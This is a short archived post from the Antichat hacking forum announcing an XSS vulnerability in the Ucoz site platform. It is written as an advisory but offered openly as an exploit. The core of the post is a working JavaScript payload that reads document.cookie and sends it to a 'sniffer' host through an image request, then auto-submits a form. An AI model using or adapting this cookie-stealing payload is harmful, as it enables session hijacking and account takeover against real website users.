Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Межсайтовый скриптинг в Ucoz (https://forum.antichat.xyz/showthread.php?t=226171)

%R00tKit% 26.08.2010 17:32
Программа: Ucoz

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.

Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов.

Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

Код:
Code:

img = new Image(); img.src = "http://sniffer/images/s.gif?"+document.cookie;

document.main.submit();
____________________________________

(C) %R00tKit% специально для Античата


Время: 16:52